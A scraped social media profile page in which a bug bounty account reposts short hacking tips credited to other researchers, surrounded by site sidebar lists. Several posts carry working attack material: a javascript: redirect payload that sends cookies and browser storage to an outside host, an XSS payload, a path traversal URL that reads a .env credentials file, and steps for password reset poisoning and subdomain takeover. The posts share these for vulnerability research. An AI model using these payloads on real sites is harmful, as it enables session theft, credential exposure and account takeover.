Olivia
Online
Will Gates
@WllGates
Curiosity is The Engine of Achievement
Joined April 2022
243 Following
4.7K Followers
394 Posts
Pinned Tweet
“If you want to find the secrets of the universe, think in terms of energy, frequency and vibration.”
~ Nikola Tesla
/login?redirectUrl=javascript:fetch('https://t.co/TMO8C166hT 0{method:'POST',%20body:JSON.stringify({cookies:document.cookie,sessionStorage:sessionStorage,localStorage:localStorage})})
credit: @JoaoGomes12243
#bugbountytips #BugBounty
@wadgamaraldeen Keep going it’s always hard in the beginning👏
@rm_rf_chumy 💯 true
I earned $$$$$ for my submission on https://t.co/uTl6ZTUY8R
Found a flaw in /api/users/$id/rest-password/ (admin panel):
OTP exposed inside JWT → reset password → new password.
→ Admin account takeover
credit: @ZuriqiAhmad
#BugBounty #bugbountytips
@thezdi Congrats 🎉
From a small mistake to make the full control over an internal ticketing system worth $$$$.
Checkout my latest writeup:
https://t.co/xnplq6N0X7
credit: @Yousef39960629
#bugbountytips #bugbounty #bughunting
@cocomelonckz Congrats bro 😎
Sensitive Information Disclosure(path Traversal)🔥
URL: http://IP_removed/index.php/%2e%2e/%2e%2e/.env
IMPACT: Database credentials, Laravel app_key.
credit: @datafuel0
#BugBounty #bugbountytip
My new writeup: 23000$ for Authentication Bypass & File Upload & Arbitrary File Overwrite
credit: @h4x0r_dz
#bugbountytips #BugBounty #infosec
https://t.co/m1U1ZtcIUd
⚡ 'Datr' cookie theft and AI leads to Facebook account takeover via trusted device recovery ($24,000 bounty)
Blog: https://t.co/NYKv7qkGnW
Author: @samm0uda
credit: @mqst_
#bugbountytips #BugBounty #infosec
$500 bounty for DNS email takeover via improper domain verification.
A non-authorized DNS mail under the main domain was accepted as a company email, allowing account creation and data access.
credit: @jatav_ravi
#bugbountytips #BugBounty
@base643d No, VDP program
Reflected XSS on Hyundai subdomain. 🎯
Payload:
"><svg/onload=confirm(1)>
#xss #bugbountytips #BugBounty
Account Takeover via Password Reset Poisoning
Tips :-
1- During signup or password reset flow replace the Host header value with:- Host: https://t.co/zFcxlbYqnq
2- Observe that the email verification or password reset link got poisoned
credit: @wadgamaraldeen
#bugbountytips
Subdomain Takeover via Unclaimed CNAME
1️⃣ dev(.)example(.)om → CNAME to unclaimed(.)project(.)hosting(.)com
2️⃣ project(.)hosting(.)com is not in use
3️⃣ Attacker creates a project at that provider with same name
4️⃣ Takes over dev(.)example(.)com
credit:@NullSecurityX
#bounty
Last Seen Users on Sotwe
Suka tobtruttt🍑
Seen from Malaysia
Guy 
Seen from Thailand
Rapi
Seen from India
Просто Рома
Seen from United States
Ensest CD Pasif
Seen from Turkey
Lifting Pegging
Seen from Turkey
Sumathi VIP
Seen from India
mas Dik Cupang
Seen from Indonesia
Abril chox
Seen from Turkey
Luyolopinaar
Seen from South Africa
Trends for you
Most Popular Users
Elon Musk
@elonmusk
240.1M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
108.9M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.3M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.6M followers
KATY PERRY
@katyperry
86.8M followers
Taylor Swift
@taylorswift13
80.6M followers
Lady Gaga
@ladygaga
72.1M followers
Kim Kardashian
@kimkardashian
69.4M followers
YouTube
@youtube
68.6M followers
Virat Kohli
@imvkohli
68.5M followers
Bill Gates
@billgates
63.4M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61M followers
X
@x
60.9M followers
CNN Breaking News
@cnnbrk
59.9M followers